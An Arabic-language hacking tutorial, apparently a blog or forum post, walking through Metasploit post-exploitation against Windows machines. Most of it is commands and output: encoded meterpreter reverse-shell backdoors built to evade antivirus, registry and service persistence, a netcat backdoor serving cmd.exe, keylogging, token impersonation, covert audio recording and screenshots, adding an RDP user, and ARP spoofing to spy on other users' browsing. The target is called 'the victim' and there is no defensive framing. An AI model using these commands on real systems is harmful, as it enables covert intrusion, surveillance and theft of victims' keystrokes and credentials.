لندخل اولى عالم الهكر الحقيقي و خلونا من الباتشات واحد يقول لا أعرف استعمالها وبعدين يقول أن هكر ,الهكر هو ذلك الانسان الملم بجميع أساليب الجديدة المستخدمة في إختراق الأنظمة
بدأ مشروع ثغراmetasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع ****sploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا… بدأ مشروع ثغراتmetasploit في عام 2003 تقريبا و منذ ذلك الوقت حتى يومنا هذا شهد المشروع تطوّرات عديدة و ملحوظة خصوصا بعد اطلاق الاصدار 3.0 في بداية سنة 2008, يحتوي مشروع metasploit على عدد كبير من ثغرات الأنظمة و البرامج الجاهزة للاستغلال بالاضافة للعديد من الأدوات التي تساعدنا على اكتشاف ثغرات Buffer overflow و فحص الأنظمة و الشبكات أضف الى ذلك احتوائه على قاعدة بيانات Shellcode و Opcode تساعد مكتشفي الثغرات على برمجة و كتابة استغلالاتهم بكل سهولة. و في كل اصدار جديد يضاف الى المشروع ثغرات و أدوات جديدة تجعل من ميتاسبلويت واحدا من أقوى و أسهل مشاريع الثغرات الموجودة في وقتنا هذا…المصدر
بعد هذا الشرح نبدأ بتشغيل virtualbox كما في الصورة التالية ومن يريد شرح تنصيب vbox على bt4 سأقوم بعمل شرح فيما بعد لمن يريد ذلك
This image has been resized. Click this bar to view the full image. The original image is sized 640x512. |
في البداية سنقوم بعمل باكدور مشفر بمشروع المتسبلويت نذهب إلى مجلد المشروع
يمكن تختار واحدة الرابط
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 R | ./msfencode -c 10 -t exe -o /home/punisher/meter.exe
This image has been resized. Click this bar to view the full image. The original image is sized 640x512. |
نقوم بتشغيل mfscli : واجهة أخرى تعمل من سطر الأوامر لكنها تختلف عن msfconsole بأنها ليست تفاعلية (Interactive) أي أننا لن نحتاج للدخول الى سطر أوامر المشروع وتنفيذ عدة أوامر لاستغلال الثغرة بل نستطيع القيام بذلك بتنفيذ أمر واحد فقط بعد تحديد الخيارات التي نريدها بشكل صحيح وهذا يفيدنا في استخدام المشروع من خلال Bash Script أو أي برنامج آخر
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E
This image has been resized. Click this bar to view the full image. The original image is sized 640x512. |
بعد الاختراق خيارات meterpreter ، run persistence وهذ الخيار مهم يجعل لا نفقد الضحية
وهذه بعض خيارات Maintaining اكسس ولكن استخدمت في شرح :
run persistence -h
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-X Automatically start the agent when the system boots
-h This help menu
-iThe interval in seconds between each connection attempt
-pThe port on the remote host where metasploit is listening
-rThe IP of the system running ****sploit listening for the connect back
meterpreter > run persistence -A -X -i 60 -p 4444 -r 192.168.0.69
[*] Creating a persistent agent: LHOST=192.168.0.69 LPORT=4444 (interval=60 onboot=true)[*] Persistent agent script is 731282 bytes long[*] Uploaded the persistent agent to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fjBnpFnjnN.vbs[*] Agent executed with PID 1948[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\IeDEEiTohfs[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\IeDEEiTohfs
This image has been resized. Click this bar to view the full image. The original image is sized 640x512. |
Keylogging
meterpreter > ps
500 MSTask.exe C:\WINNT\system32\MSTask.exe
528 VMwareService.exe C:\Program Files\VMwareVMware Tools\VMwareService.exe
588 WinMgmt.exe C:\WINNT\System32\WBEMWinMgmt.exe
664 notepad.exe C:\WINNT\System32\notepad.exe
724 cmd.exe C:\WINNT\System32\cmd.exe
768 Explorer.exe C:\WINNT\Explorer.exe
meterpreter > migrate 768[*] Migrating to 768...[*] Migration completed successfully.
meterpreter > getpid
Current pid: 768
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes..
meterpreter > ps
Process list
============
PID **** Path
--- ---- ----
132 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe
176 svchost.exe C:\WINDOWS\system32\svchost.exe
440 VMwareService.exe C:\Program Files\VMware\VMware Tools\VMwareService.exe
632 Explorer.EXE C:\WINDOWS\Explorer.EXE
796 smss.exe
meterpreter > migrate 632
run metsvc -h[*]
OPTIONS:
-A Automatically start a matching multi/handler to connect to the service
-h This help menu
-r Uninstall an existing Meterpreter service (files must be deleted manually)
meterpreter > run metsvc[*] Creating a meterpreter service on port 31337[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...[*] >> Uploading metsrv.dll...[*] >> Uploading metsvc-server.exe...[*] >> Uploading metsvc.exe...[*] Starting the service...[*] * Installing service metsvc
* Starting service
Service metsvc successfully installed.
meterpreter >
use exploit/multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST 192.168.1.104
RHOST => 192.168.1.104
show options
exploit[*] Starting the payload handler...[*] Started bind handler[*] Meterpreter session 2 opened (192.168.1.101:60840 -> 192.168.1.104:31337)
ps
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > getuid
Server user****: NT AUTHORITY\SYSTEM
meterpreter >
This image has been resized. Click this bar to view the full image. The original image is sized 640x480. |
************************************************** ************************************
Persistent Netcat Backdoor
upload /tmp/nc.exe C:\\windows\\system32
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
execute -f cmd -i
C:\********s and Settings\Jim\My ********s> netsh firewall show opmode
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
netsh firewall show portopening
root@bt4:/pentest/exploits/framework3# nc -v 172.16.104.128 455
This image has been resized. Click this bar to view the full image. The original image is sized 640x512. |
Fun with Incognito
meterpreter > use incognito
meterpreter >help
meterpreter >list_tokens -u
meterpreter >impersonate_token SNEAKS.IN\\Administrator
meterpreter > getuid
meterpreter > execute -f cmd.exe -i -t
C:\WINDOWS\system32>whoami
meterpreter >run soundrecorder -h
meterpreter >run soundrecorder -t 10
/root/.msf3/logs/soundrecord/
run getgui -u hax0r -p gibs0n
rdesktop -u hax0r -p gibs0n 192.168.1.3
This image has been resized. Click this bar to view the full image. The original image is sized 640x480. |
screenshot
meterpreter > ps
meterpreter > migrate 260[*] Migrating to 260...[*] Migration completed successfully.
meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot /tmp/moo.bmp[*] Image saved to /tmp/moo.bmp
فيديو يشرح استخدام برنامج Ettercap مع اضافة remote_browser لعمل arp spoofing والتقاط الروابط التي يتم فتحها بالشبكة مع برنامج Driftnet لعرض الصور التي يقوم المستخدمين بمشاهدته
لتشغيل البرامج نكتب في طرفية الأكواد التالية
ettercap -T -q -M arp:remote -P remote_browser -i eth0 //
driftnet -i eth0
This image has been resized. Click this bar to view the full image. The original image is sized 640x512. |
ملاحظة كل ماهو ملون بالأحمر عبارة عن روابط شكراً الموضوع عملت سريعا لمزيد من الشرح ترك رد
الشرح مطبق على جهازي
مكان النجوم نكتب **** ميتا
التوقيع |
Aucun commentaire:
Enregistrer un commentaire